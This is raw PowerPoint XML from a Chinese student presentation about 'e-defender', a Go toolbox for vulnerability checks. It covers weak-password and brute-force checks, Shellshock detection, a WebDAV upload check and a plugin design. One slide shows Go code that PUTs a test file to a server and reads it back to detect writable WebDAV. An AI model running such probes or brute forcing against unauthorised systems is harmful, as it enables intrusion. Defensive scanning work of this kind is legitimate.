              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>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62A8A7-AF2A-6845-ACED-09D6760A16E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1728592" y="1578279"/>
            <a:ext cx="8680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dav</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>模块会检测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服务器是否</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>开启了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>WebDav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>且配置不当导致攻击者可上传文件到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>目录，实现逻辑就是会尝试发起</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>put</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>请求，然后想服务器发送一个测试文件，然后再使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>get</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>请求，看看能不能获取这个文件，代码在下面的一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ppt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88819B-A848-2E4D-8B59-86723555BBF2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1227551" y="2818356"/>
            <a:ext cx="10258816" cy="35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0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D9FA4-EA5D-6344-8EC9-08A4C3502894}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1791222" y="0"/>
            <a:ext cx="8154444" cy="627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40"/>
              </a:lnSpc>
            </a:pPr>
            <a:br>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>func</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
              <a:t> (d *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>webDav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
              <a:t>) Check(URL string, meta </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>plugin.TaskMeta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
              <a:t>) bool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fmt.Println</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
              <a:t>(URL)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putURL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
              <a:t> := URL + "/" + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>util.GetRandomString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
              <a:t>(6) + ".txt"</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
              <a:t>   request, err := </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>http.NewRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
              <a:t>("PUT", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>putURL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>strings.NewReader</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>vultest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
              <a:t>"))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_, err = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>util.RequestDo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
              <a:t>(request, false,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vRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
              <a:t>, err := </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>http.NewRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
              <a:t>("GET", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>putURL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
              <a:t>, nil)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resp, err := </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>util.RequestDo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>vRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
              <a:t>, true,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if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>strings.Contains</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>resp.ResponseRaw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
              <a:t>, "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>vultest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
              <a:t>") {</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
              <a:t>      result := </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>d.info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result.Response</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>resp.ResponseRaw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result.Request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>resp.RequestRaw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d.result</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
              <a:t> = append(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>d.result</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
              <a:t>, result)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
              <a:t>      return true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return false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53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E0BDB-C419-7247-93CF-C74DF4D7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58398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插件化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B0B526-043D-2B47-A559-25A0442DBE05}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1816274" y="1490597"/>
            <a:ext cx="8880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e-defender</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>和一个比较核心的特性就是插件化，可以支持平滑的拓展，如果有新的功能想要加入，只需要在</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>plugin/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>goPlugins</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>中添加相关函数即可，新添加的这个对象只要实现了如下接口，就是一个可用的插件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// </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>GoPlugin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>插件接口</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
              <a:t>type </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>GoPlugin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
              <a:t> interface {</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
              <a:t>   Init() Plugin</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
              <a:t>   Check(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>netloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
              <a:t> string, meta </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>TaskMeta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
              <a:t>) bool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GetResult</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
              <a:t>() []Plugin</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="en" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en" dirty="0"/>
              <a:t>插件</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>采用自注册的模式，这里使用了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语言的一个语法特性，在包初始化的时候将自己注册到</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>pulgin</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>树，如下是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弱密码检测插件自注册的代码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 err="1"/>
              <a:t>func</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>init</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
              <a:t>()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plugin.Regist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
              <a:t>", &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>mysqlWeakPass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
              <a:t>{})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2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78CC-D184-EF41-A173-ECDF4667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灵感来源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4E41-3E57-964D-9D4A-A082B97C82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81303" y="2091520"/>
            <a:ext cx="7829393" cy="342410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网上类似的安全产品很常见，但是很多框架</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>工具都有以下几个特点</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>使用太繁琐</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>代码可读性差</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>功能不够全</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>可拓展性低</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="68027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28DBC-0846-E247-A917-E72D5A12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工程效率实践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4C522-7C6D-0F45-881A-F18BBFCCB3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git</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>作为版本控制工具</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>单测一定要补全</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Changelog</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>记得写</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>能上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就上</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN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058888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715DE-A2E1-7B48-BF0A-ABA222B4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感谢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E69CA-3258-ED4C-B368-7C2947F158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4643307"/>
            <a:ext cx="10364451" cy="11478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4000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>゜</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>゜</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="4000"/>
              <a:t>つロ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>干杯</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" dirty="0"/>
              <a:t>~-</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="60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390954-3CE6-954E-B051-2C3E8FAC91CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1941534" y="2392471"/>
            <a:ext cx="93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课设结束之后代码会开源，关注 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://github.com/cjphaha/eDefender</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>欢迎共享</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>pr</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>或者提</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN"/>
              <a:t>issue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10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A41B8-324C-E842-93EB-01900E64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77" y="2497421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于是我拍了拍头发不太多的脑袋，想做一个简单易用的工具</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24397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8249-FA04-A444-880D-4AA366AE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3D06E0-911C-7E4A-A76E-BF13092C4BDC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1177447" y="2104373"/>
            <a:ext cx="951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e-</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1"/>
              <a:t>definder</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>是一个集大成的网络安全工具箱，可以支持弱密码检测、密码爆破、服务器状态检测、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>破壳检测等功能</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42931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729A-5C69-DF49-AE36-486B59F1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CDFCB-52D6-9F4F-A60B-654958933A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Zookeeper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 err="1"/>
              <a:t>Mysql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 err="1"/>
              <a:t>Ssh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/>
              <a:t>Shell</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>破壳检测</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>服务器状态检测</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="178512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889E-3E01-1B41-A3CE-F5A40A89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8413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技术选型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9B21D-53F2-4641-831D-991E7B6BBD0A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2192055" y="3006247"/>
            <a:ext cx="78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本文会大概的介绍一下用到的一些技术</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13273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889E-3E01-1B41-A3CE-F5A40A89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为什么用</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>go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56414E-AE65-9045-AC45-0F305A0C122A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1039660" y="2379945"/>
            <a:ext cx="9770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	Go</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>是一门非常年轻的语言，没有什么历史包袱。</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> 10</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>年诞生，直接抛弃了原有的严格意义上的面向对象的编程，从用户态抽象出协程这一大杀器，随便一台老笔记本轻轻松松几万个并发。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并且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在云原生时代有天然的优势。诸如</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>k8s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docker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prometheus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consul</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>等中间件和基础设置的流行，使得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天生支持云原生。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目前已经将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实践的公司有 哔哩哔哩，字节跳动，腾讯，百度，阿里巴巴，华为，谷歌等一二线大厂。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="203590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95D6-F685-7841-8E6E-5302BFE7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D84B-8744-8B45-851D-89059C4644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407673" cy="149092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我们认为接口是一种比较好的使用方式，因为接口的调用方式比较多样，对于开发经验比较少的同学也可以使用</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>postman</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>来调用，调用方式如下：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86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5D68-08CC-C348-B7B6-CA594389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876" y="167581"/>
            <a:ext cx="4634631" cy="57145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查看插件列表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D7ACBA-74AA-1F4E-A029-BFCB72C0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9" y="629412"/>
            <a:ext cx="9595950" cy="62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8889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{A889E5DC-3586-2E4D-BD39-80BA5B10C15F}tf10001073</Template>
  <TotalTime>623</TotalTime>
  <Words>1609</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>59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Tw Cen MT</vt:lpstr>
      <vt:lpstr>水滴</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>灵感来源</vt:lpstr>
      <vt:lpstr>于是我拍了拍头发不太多的脑袋，想做一个简单易用的工具</vt:lpstr>
      <vt:lpstr>项目介绍</vt:lpstr>
      <vt:lpstr>功能清单</vt:lpstr>
      <vt:lpstr>技术选型</vt:lpstr>
      <vt:lpstr>为什么用go？</vt:lpstr>
      <vt:lpstr>使用方式</vt:lpstr>
      <vt:lpstr>查看插件列表</vt:lpstr>
      <vt:lpstr>漏洞检查</vt:lpstr>
      <vt:lpstr>服务器状态检测</vt:lpstr>
      <vt:lpstr>核心模块精讲</vt:lpstr>
      <vt:lpstr>Zk弱密码检测</vt:lpstr>
      <vt:lpstr>Shell破壳检测</vt:lpstr>
      <vt:lpstr>破壳漏洞检测思路</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>Web dav检测</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>插件化</vt:lpstr>
      <vt:lpstr>工程效率实践</vt:lpstr>
      <vt:lpstr>感谢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家鹏</dc:creator>
  <cp:lastModifiedBy>陈 家鹏</cp:lastModifiedBy>
  <cp:revision>131</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-06-08T17:51:16Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-06-09T06:27:22Z</dcterms:modified>
</cp:coreProperties>
</file>